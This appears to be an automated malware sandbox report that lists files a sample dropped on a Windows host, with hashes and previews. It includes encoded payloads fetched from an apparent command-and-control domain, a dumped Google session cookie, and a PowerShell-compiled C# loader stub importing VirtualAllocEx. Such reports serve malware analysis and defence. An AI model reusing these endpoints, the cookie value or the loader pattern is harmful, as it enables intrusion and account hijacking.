SHA-256:	099AD40CE77A76A7F521551DBF4790AC15874F6BB8DA92E59144B7CF85FBC248
SHA-512:	AA439EF31B571A1F6EB37B3766B9523F225DAA1433EB2C2DA48E521F77976D4998D5728E9E3F786FC4402460A111D8A846501B3C70FCB3FFE1F13CF9FE84F51C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A94CA2A4-2DE9-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28164
Entropy (8bit):	1.9245425898445319
Encrypted:	false
SSDEEP:	96:r8ZHQs6uBStFjZ2tkW9MUYVsSa/xkIVsS7a/xkCd4A:r8ZHQs6uktFjZ2tkW9MUYVc5FVw59WA
MD5:	380605526034CC6DD0BE5044E0F13079
SHA1:	F10B1268FD0C7593A2174246730999181D41FA46
SHA-256:	77EAA2C21F23EBA6CAEB9572507E18128B43A02CBECC9B137333B09E407328A8
SHA-512:	CA390738A1E5CAAC32EEDA49D7767BACBA670989CACC3F530AA15523A7BB7691A538AB2863B28C8B59DD33041BC1ED5C9FAD0BACF145A62840930BAC2CAA572A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\oI2[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2400
Entropy (8bit):	5.975522616591464
Encrypted:	false
SSDEEP:	48:T2ECG/vT+XLMHbLRCI24UCknBdpK2jgPOKipWUlgrjDu5pODzMHxW:KECGT+XqLxwnBbK8WUlqqaHMHxW
MD5:	E69A66BA1BFF6972458D1BC41252EE98
SHA1:	262423E195EE52FE55A2FA3CCD97E9B6619117A5
SHA-256:	F1D70F929CDCB80F5CD8AAE9F8A41AB63FA171F224206A020596F73E88E384B2
SHA-512:	5EBDB4B48518CD539BE0ED3CC3EE25996D14A8E473DD0F0261439BF04F416902E6ACDA45E00DEF009CAD129EBC4EAD09A791357AACC3B829C4973080783BEEA7
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/3KeMhgiT8xV_/2FK897xWvJR/8iXi7QgKkQnFJA/vQvtuI7pl2axq2iQpRqfy/IcWdr95MWH_2FlIm/pxVwXYLRRjXX0iQ/Uu36CRnAWqyyANtvaC/GzBvnVm6z/2Vvse0Pv_2F2DgCjCiAr/HbSFwBUye9G83hlGQIE/ynlkRMDXeczvpYVDo2l1f2/u19mcvVVhmsQS/4qg7eRGS/y4iFh_2B2qVkDLa3nN1YMA_/2BF6h0vTAz/LS1BzJAVb8zBnnLnm/vKxwpRLQLhui/Ux_0A_0DFAv/2rNCEQzrqGRLrU/KP0aNmF_2FPI7PEUIWwdT/BT8ui2_2Bzid3re8/3_2BW_2BnNoX7CzUq5G/oI2
Preview:	DnobSCt1acMLFsADNayhTZdaOfIuV71NRKZHHWnAGjoBIui5QG57YKyKNVOyL+zVwyrVuY5JbkTcKoHdRv/9ePWkpxcJKYZgxcF0rwtfpRcD7pGcRemPj2cqe79rGwYYIMtAvaYU74+Vn9T8zJ6m7Z4B3FWxGP7uKILEfJ07sG9J8KJ2lHPgZO/wzeS/zePRIYrCT/y9LgGj2vBWJ3GUsl9HA86aiXB6KubePlvwVTXOhj5FtyPo5bIRdm+NRRe0lh0BZuKHprUEzv66hkW36EVlw653bE6CIWe1AQeoGH9xYtJVCNDk5f1jhZKYMeSNIsHWxtdSYXq6gimI48VGPYfb75q12pdqPATTaCwMOifpnH+DDgJN8tFby8y+on9NZMUrBKJzxzLPJxb5Dp4oNQhX4Xz1BOQfOA0QovUjfzgLZSdfDC9iCVURu3oFy3AlObvlokn26IOHTIaKH8JRyGu6UyxxlkTkeFb60ZQ0QDV7T5Tocg7JOmSC9k0+GFuaB2Vq0/sBR2KS07n58zJx/qhviv/dDJAMQ/KCx8uj0ziJ4QH4zOSt3IF4ldDKpyEIyJpZw5iUplcOhqk/20g0lcZk/aX9wV7Ul1ehExIs8aRpgOWJbEW5Anaqs1vuBDoV5VZhbiw/qJm9XZsM7FENPZIRi4L4N/3/qZxbQGGQRhCNRTju995dOkAHIcLBdSV8ZXt8gZHOaVht6KZs5pdBCYFcCkkWuB7mp3V/cpg40FIuPpAXlhl3A+YkgiPorTap/JRrLkF2PPLHaaEMg8tXNuDMWgTEQ98SxdMfv0ri4jDj/zG2E+anMa568WfVUYg+co4YF3trNY7+3kKKfTGSXitWdmo7oMHyKVVoKYAHqNQICJoYtdap67qE6WAAqktSKoRR+0/fdetpF6IylEoZoyY9mC7oCTwbWRUXzL7zINyxbW3oJnlQd5HGLVr8+0M4FnEVSO70ktdW0OFE7e4bFVTwjUuYY2A07QVrO96D

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\6d[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	338016
Entropy (8bit):	5.999979867333796
Encrypted:	false
SSDEEP:	6144:h7OGXHIEr+zisK8tb3/VKph5ur8FlLivxSZXKoWEPws/2ImLLW4Ytb31Zmqq:N1iis338p6r8lLi5ScrUwwjsC4YtbFYV
MD5:	AB868B345CA418AA4FACC6D46BD38178
SHA1:	A0A4189DC35EF39534A2EE41980275348B7AA8EE
SHA-256:	DAA9372E5A21C9079A646855110C83154D77B5E6DF2F37E949EA8452ABC1EF27
SHA-512:	1AE9D9E1D1C2BB3972433EBCE0DB8CAEEDA67AA93D1C8F09452593D67E59936446486B47B0C0775DF26F484479EB79818FC1D05526C6556B132FACB08A2A9D9C
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/ZndIxL1Rb/5wthxjo8h6XlGXwhQjpI/qR4_2Bxy4qmCmpod_2F/aR_2Bq10kCEEmmsKL463nm/IwJnUBwMFW3IE/IWX2kgn2/AlRW6_2FwG8heSg8_2F45kx/d4CTG40DuC/sB_2BD_2BsM3jQ0t4/hyjobYI0rasE/sXzcAxdFd67/YKNQnrZrruVtZL/y9fsMRIhJ_2BBspvP_2FO/RHYAogT86Q7GBO8a/8pyYO5iimp3k3ij/LQMLc4JwFGySVUyYlf/Y3_2Fdd4T/rv7G_2ByjMoeYiU5c_0A/_0D1PNgf8iqzwUhfRFh/19iAB9EdF6LCz3fArW2WPs/VDtJz46818gnQ/eDClUEW1AGzlbdI/6d
Preview:	hfUxqII5Ucqr2j8G0pSsTUuRmxcFmoXcLmjRBGjBaQQjiDhA7mumvDgeD/0tofjz+W8FCeTcggnq2pG2/2dNgiJYlJW0RCu98vw8Djsgvml9iYg8qaAvHSJCZOSTOfUWEbxo+NpORUwIIznyDtzgZcwokYZzLi15HQOfj+1DZJ3R1ZFmPQvSQ4b++fE8BvPhiT+t1AwGGj5aXeZjPCtzot/33P+dl9duvr9qk16vXdWpTO9FBJKWhKFnm99hQtte5/A+WXyHIg6kH2fRPWkpAAeAjx6GTgrdqyJ5ta8I0Teer8YPp2JLzAz1CBTkRC7j2bRE4pDMpNpn7JOAACUG/6dZi5Yst1MW8DfBSF6VrUToD8ZRo25HLorSmnYnqFEtORzQr24udRjr6vNrEEDxhv1aKVDf8yflSZ708nHYqykcHeq76BV8yPDFpMXdDSs8dck4afi48/xE3PRUZLbrMUC4wao51w+iBr2rsoeZ8k0g+PpkJj4yw8c0Sf0n3T2B3HvSvFEKKIGAHb0pE4rOJA6dOR0cuDOwJFkIscNL7ADK+OjdgFpxAn157U7+IAB9LnyqsP6/mNDEXiSen3NFOwFnFU6hfeC+G48BfKnq/qvuvQIZ+0P+Px+2QfYAaN4XMdGG4GSbV1hcgcrYlmJinwCuwry7nqwOJJTMO6aG2akKHxmOqULD9g0jScx3WiO2T/Iu3MJzOPRYkMReKQTQS5z52ojXVb8vEhsQWrqP00AYUzz8Ohm33hI3Fus+CF8kbgpLSV4KHLmNrwGxMZGMT7b6p8ymYWB8Z9onfS3JhUwnKkRNa5uaBcpe/pel5XN55d85MgnQx/IJXCtj5/gbX6LjdyEaZDGXga1Il7Aq/73O0ADxir3dVXudlyrcl8VDWBGshmjMxLf9g7BphGB9Jv6r7vi+BLDeIaJ43iCMusF5WfEegCmtpXa8y6IVUuQT5dUKlWn40gwfaejEyaaP7aY6diF0/062DbkOLv2x

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\lACGR[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	267700
Entropy (8bit):	5.999877808101812
Encrypted:	false
SSDEEP:	6144:0GtBeRO1EXAR18gvZYQhlTIorpKkFqBCf:/tgROGm1qEl9rpKhi
MD5:	BF32F421FA2847FAA8DB0BE9201BA6DE
SHA1:	FD7A60D7431272DD5906940F08933E9A86A4283B
SHA-256:	FCA7FA4DFFAD605B97E30A75F5847E54E1B16D89B13C2542ACA5B1208F400F9A
SHA-512:	56E1D7C7AFF4A81EAF3209EA2F1812960260D8BDBC0DC3B3501D78C48FC978D8C431714063D98D1EEF2D88F47B32E45BD9F59596DCE4FC82DB54CFA382D32649
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/zQt8WvwqX1ucd4e_/2BSjEwnwCh3l6nl/uRpMWVq6Na7DVvVqDQ/c_2F8RJYX/bwf8F3MzlXzQXVHyRWwx/arvl4jzmt4MjkOLeA5D/hFQALRzK_2FfnX1J_2B_2B/QVhfzXC95MQT_/2F5JxPkR/0hfcwScbYsxo4WDetMu7ETB/kC0bi1gC1M/Peufr7Q9aEqhXzY9P/IP_2BoMUFEki/3WBXS7Ps9gU/B0guoxmZ0c7HMP/MN7IPcCq62eYfghVtkrOj/cDqHZNRKwjs9dSDB/S_2B_0A_0DCG5Ou/hoVuqtcbmguh8Hg01X/wBH_2FHER/Tq885DE0KGS3yQbLseza/xevKBRy_2Beq5lp/lACGR
Preview:	qrKLV7cX9FFkSZiLVGD0AujmwUS0lszsgRtLkJXbDnMxZEbQcLEMZP9AENVbi5t1P6FM9USacZ/3BMQZkHB9hoDeH08G+UQzLtWGW/dkh4vuAVlR5/L8jals82A4PsE+4rYf+6rtVVm/Ykx2kj7O4ExT5YR4wyNPx7I4rr3mAbTFDjbluYNOJjH2L0jSLyplHmE13dMJWnh23P8iX+1PV0O8nA+g4rKMGsDk17cg7Mpm2+KENW0D7aP656j+zDi4XuEwLHoKHQCMmRLzjMYa+JlQWVcojKBWJow3YO3mh4st36teMmuq7CDN0CS+UzlOCwwGLAPkNcJ5So/uRvN2b7/LAHSZ7Nz8Hyl7qLNsBFoB3AxyDWGiN35FSvAUhliKGuiWH0g+Uq2FYkTkrbjyAw50GGl7jm0NsxSNJ9QLXS2VAsJrevbFGPXTxKE5L83E5Ro75Rmw8q4M5wV2mXErc8nR+ie6oWM2B5R1ZYnhKQBcnjdp65o5Ah7KmVYWPIRfpMYWVJcafkmS8cMatpOMwp5suS4CRPoZNFUnE6lrxL61N5dBLj6RuExp5V+asqnE7A5QmA/n18LGvj6qjxKPgE65id9rxkKgba5f54YY/lYDhIP6nLfYq5xV468uVBen9rzpUXeDv3Um63c1dVJgUgTRj7BKojuJjAMrmUAa5ksECw1w7bApTFxWNccAv5sduNu6+3wyS8oHmYqNgO8gIiec04H8HnK01LGhw9SoiTerEn3c6Vu9kh40fFb/b9SR0bc/4IUDWPVDnOECj6ydXpuAL7r6b1IranAdntHu+1pUi2rpGUW9SiR6Kcw0ct5qfTyCu/13Sz4O+B1J9bC4XnrOS/Pn9doI6NQM7JdupPSfQtqo1U2FIoki0yu26nOY3p4SQAXzH+hLw69CTMH3KIRtxt92Bo/X+oktP5kOorL7VwMtzq9r5bmY3JR9uHDFnlkMFBny2+WTnyrdCZQn3m45DUQB5mTGMtL1f8Y+

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\C22A.bin Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.573463456530022
Encrypted:	false
SSDEEP:	6:YM6jkk4RTeJr/pU98M7ETSHp926Sfp2LiGvsHo3HWvmWogYmmYIkV0NAXhtff:YJkk4Rg/p4vE6UxfELiaskYLmWV0GhtH
MD5:	C776E0BF04DF2D40BB86437F43C74CBF
SHA1:	3241F454C899AA8984347141AB38D85FC5756036
SHA-256:	56BDA2DD863AE13A0BD1748BA442E85992AD0DB739BE0CACF881BF9EAF632F75
SHA-512:	AF52669DFDD0419F2E844BC2BCD4DE0C4EA6B53F0AD507E61EEAB6C9FDE45F164FE5D173B353F8BCE154D396743C4AAD407BF11D7C70152D4EF55121C04207AC
Malicious:	false
Preview:	{"id":0,"agent":"CR","domain":".google.com","expirationDate":1617289277,"hostOnly":false,"httpOnly":true,"name":"NID","path":"/","sameSite":"false","secure":true,"session":false,"storeId":"0","value":"204=Zby1pa4NqcXVsIGE_3ZmaJyb6wd0ytCetXAGAYyCxqs2oB7GnI3pgyhDqSLplEUbd5KtDmFut9_ZUC4e6qUSqOJD3t1X1QzZ6EDKsemEKsaJT7QdaJ3DLNev4XjTqyplJqeiHY0L0dD9AvRUlTYjHSmBPUv-_Y4cj4q4NBiv_34"}

C:\Users\user\AppData\Local\Temp\D7D3.bin Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	442
Entropy (8bit):	6.531810963450023
Encrypted:	false
SSDEEP:	12:6GSXhihRqtI4OTSuaLy3jWopcbP63lrP6AMajtn:gCRqteersjWoubPoVtn
MD5:	E337F1CD31A5612CF06F513B5E7C5465
SHA1:	88A7F46365D32DE52B268E55611426F36559B631
SHA-256:	8E2F39C0EC845C5E4DED2FB4A301ED9FB858B6930A5AFF9D4D29ECA32057EE6E
SHA-512:	83DC457549D6DDFB35DEDF22BF35FE9379D3254761B89CC85E7D93DBC6A31A52F1126F26431766074EB90FE5460F6485EDF047660F63EC5E708EE54F5F2CA318
Malicious:	false
Preview:	..............................22A.bin=.]O.0...K...#.b......0...2........E.w.}r...OP..Rf.........@Nk\62..J...3ZKLnm.aQ..aA.....=.4....b.T#..p..B..@t......\|.......r...T.~............1..#...(rw.U?........,.^..vR=..7...\..MD.\/..1...n\.-..b.....?l...{.H...`a.........p....r..C.=..\|2..zbc[y...X.)9Z,.cX...&.W/.p..0.B..U9.:._.PK..............+,...z.......PK................+,...z.....................22A.binPK..........5...Q.....

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.411614364643764
Encrypted:	false
SSDEEP:	3:oVXVPWKfN44bVU498JOGXnFPWKfN44bVpk+n:o9IK9O49qYK9P
MD5:	BA6458C47F0D3EE5DAF8F1F7215C1E8E
SHA1:	E1A0C41A9CAF45EE5383E8316C9F6569DEF6D601
SHA-256:	8EA6C02DB909944537AAC4199848E24D232FBFE46ADB0995E613E51DE321A988
SHA-512:	06970B3A859CDEFC3EE95ADC7473F2D6A209971BDCF10633DCE51B9ECC5C82500B6E9123CE0B4B5D45E427A5EF80CBA41D7AF788C5B8712C6E87D439C2F02CD2
Malicious:	false
Preview:	[2020/11/23 16:11:57.390] Latest deploy version: ..[2020/11/23 16:11:57.390] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\RES508E.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.7146650543333353
Encrypted:	false
SSDEEP:	24:bP1Ln9WhhH4AhKdNNI+ycuZhN6akSiPNnq9qpYe9Ep:bP1D92RKd31ul6a3uq9v
MD5:	6F3BB3DB26B42AD1A5A856250F77D2DE
SHA1:	5B25BF9CE6C931CECA5A23820EFB3AC7E540FCFD
SHA-256:	43A9B43D02743838C6B4EEFC07DF1984679AE5E5E96377D9A682928192EA81A0
SHA-512:	482940938644677B713482B0A9BE943674ED3D1E2B37E49D30C50A9BBDD8D4317EE6960CC285AA61EC0D2A4B06A502B94916B6C93FDC7B92CA4BF12B39808FD2
Malicious:	false
Preview:	........S....c:\Users\user\AppData\Local\Temp\p4xjawzl\CSCF25F578263E4AA98A5ACFCF8CC63832.TMP.................>.n...r.................4.......C:\Users\user\AppData\Local\Temp\RES508E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES5FA2.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.7030727888401826
Encrypted:	false
SSDEEP:	24:pgHahH9hKdNNI+ycuZhNM8akS1RPNnq9qpke9Ep:KerKd31ulVa3Jq9T
MD5:	0DC350DCA944166A9A7D6624B3DB11A0
SHA1:	863BB914122002AB2DA4768A6AD2B89DAB777D41
SHA-256:	0AB2D378D9081359679AC81B190416C858CBCEAD15312C482510EF8557C99A25
SHA-512:	73A92ED4A61D6982ED0A17B071AB983901A8BBA2B4FF937E4B2F92E908B5B9292D7A504EFBFCC99D65FF1A9AA010971DBAB69D530A93F6A034B8790A4FE25D61
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\c2racwwn\CSC8F1415F2367845AF84D1583CADF7143D.TMP.................9. ".L..B,.2+...........4.......C:\Users\user\AppData\Local\Temp\RES5FA2.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqzl2q13.rdv.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsgauv2p.1mb.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\adobe.url Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.699454908123665
Encrypted:	false
SSDEEP:	3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
MD5:	99D9EE4F5137B94435D9BF49726E3D7B
SHA1:	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
SHA-256:	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
SHA-512:	7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
Malicious:	false
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

C:\Users\user\AppData\Local\Temp\baby.srt Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.582118926162054
Encrypted:	false
SSDEEP:	3:goVUmoh:goVUmoh
MD5:	B65E75C090BAB4D266CDDB68A72B86AA
SHA1:	D069F5D2B225C97DEAF7728084094CC7B02A7BD9
SHA-256:	ADF7C7A26F024895504AB358A846DAD6D52FD9E04C5A517EE176AD3B122B6A21
SHA-512:	6D4E732DE8409944992E35F433A068C2A857840061B5317908A18ADBFAE99FE8DB3C9209E1F389FE880A11C24B3DE0A242B408BBD5FCD4791E38FCAE7E5C277E
Malicious:	false
Preview:	vmFjgnscGYmVJXoTQQtqiUDcTkbIe

C:\Users\user\AppData\Local\Temp\c2racwwn\CSC8F1415F2367845AF84D1583CADF7143D.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0941625748832178
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryrS8ak7Ynqq2SRPN5Dlq5J:+RI+ycuZhNM8akS1RPNnqX
MD5:	E8CC39BB2022A54C1EC2422C03322BFB
SHA1:	EB8E3B12085FAD5A7052BFFFA60E18D15F47DA23
SHA-256:	DEDC60E8A7FC62EF243EA1CCA93FD53ED62C07BE40D6F425D8B4C73A02738E68
SHA-512:	57BD91B891EF75C8C7A01DA143B62183DE9EBFD7C94C5D52476A4ECA6AAD39B4C4046C2CCD0779C51E32BCD50E7D8D6E9E34A655C38BA0394BD12E96FA7CE8D9
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.2.r.a.c.w.w.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.2.r.a.c.w.w.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	414
Entropy (8bit):	5.000775845755204
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
MD5:	216105852331C904BA5D540DE538DD4E
SHA1:	EE80274EBF645987E942277F7E0DE23B51011752
SHA-256:	408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
SHA-512:	602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.

C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.249544511809344
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fsUpezxs7+AEszIWXp+N23fsUpJx:p37Lvkmb6KHUKeWZE8UKJx
MD5:	C4DA9C0D508F9C478447367167873FED
SHA1:	B7F2534460B3634DC74245B96DDAAFF94147850C
SHA-256:	A0D7DE46ACF96EA602573E27899773B2A092379931B74D4A5506EAF790884D1C
SHA-512:	1841774BB42B51F654FAB7638326D2CACB6E76A415EE5C6B8B47D3AF49701955669053B2D7B46F63DC04AF6DD3418600F91ADF66539A08F0462538891E460AD8
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.0.cs"

C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6288693934940017
Encrypted:	false
SSDEEP:	48:6o7qMTxzJUyNUiwWQYwSJ16J1ulVa3Jq:1qYxJgTC3K
MD5:	911466B6E276B14D61F80C27B81C97B2
SHA1:	23196242FDB745C292F68ACFB301264294730E2C
SHA-256:	201F1FD4373D33C902D4F9F2BB1B8E759F2BC18C9B532E1D7052202ABF704A14
SHA-512:	04D8B70C38C7976B6300A1FF0523F0B1DA14D2F853A634AB76C054F9FE0D140215718429F53296C1C069AB8DF4C3F5669437010B61B5E0C876282C5CAB665C5E
Malicious:	false
